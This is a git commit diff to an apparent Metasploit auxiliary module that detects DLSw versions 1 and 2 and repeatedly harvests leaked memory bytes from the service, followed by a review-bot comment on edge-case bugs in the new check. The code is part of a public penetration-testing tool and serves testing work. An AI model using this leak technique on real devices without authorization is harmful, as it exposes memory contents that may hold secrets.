added DLSw v1 and v2 check, added check for \x00 in leak segment

bug/bundler_fix
tate 2014-12-03 23:27:11 -07:00
parent e9750e2df8
commit 3aecd3a10e
1 changed files with 14 additions and 12 deletions


@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
"#{rhost}:#{rport}" "#{rhost}:#{rport}"
end end
def get_response(size = 8) def get_response(size = 72)
connect connect
response = sock.get_once(size) response = sock.get_once(size)
disconnect disconnect
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
if response.blank? if response.blank?
vprint_status("#{peer}: no response") vprint_status("#{peer}: no response")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
elsif response[0..3] == "\x31\x48\x01\x5b" elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
vprint_good("#{peer}: Detected DLSw protocol") vprint_good("#{peer}: Detected DLSw protocol")
report_service( report_service(
host: rhost, host: rhost,
@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
) )
# TODO: check that response has something that truly indicates it is vulnerable # TODO: check that response has something that truly indicates it is vulnerable
# and not simply that it responded # and not simply that it responded
unless response[18..72].scan(/\x00/).length == 54
print_good("#{peer}: leaked #{response.length} bytes") print_good("#{peer}: leaked #{response.length} bytes")
report_vuln( report_vuln(
host: rhost, host: rhost,
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Auxiliary
info: "Module #{fullname} collected #{response.length} bytes" info: "Module #{fullname} collected #{response.length} bytes"
) )
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
end
else else
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -92,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
dlsw_data = '' dlsw_data = ''
until dlsw_data.length > datastore['LEAK_AMOUNT'] until dlsw_data.length > datastore['LEAK_AMOUNT']
response = get_response(72) response = get_response
dlsw_data << response[18..72] unless response.blank? dlsw_data << response[18..72] unless response.blank?
end end
loot_and_report(dlsw_data) loot_and_report(dlsw_data)
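Review bot: The new `unless response[18..72].scan(/\x00/).length == 54` guard (opened in the third hunk, closed by the `end` added in the fourth) has no `else`, so when the leak segment is all nulls the `elsif` branch evaluates to `nil` and `check` returns no CheckCode at all, even though DLSw was just detected and reported via `report_service`; it also assumes the reply is at least 18 bytes, because `response[18..72]` is `nil` for a shorter `get_once` result and `.scan` then raises NoMethodError. The same slice feeds `dlsw_data <<` in the last hunk, which appears to be pre-existing but would raise TypeError on a short reply for the same reason. I would bind the segment once and compare against its own length instead of the hard-coded 54 that only holds for the 72-byte default: `leak = response[18..72].to_s` / `unless leak.empty? || leak.count("\x00") == leak.length`, and give the `unless` an `else` returning `Exploit::CheckCode::Detected` so the service-detected-but-nothing-leaked case still yields a CheckCode. The `check` method itself begins and ends outside these hunks.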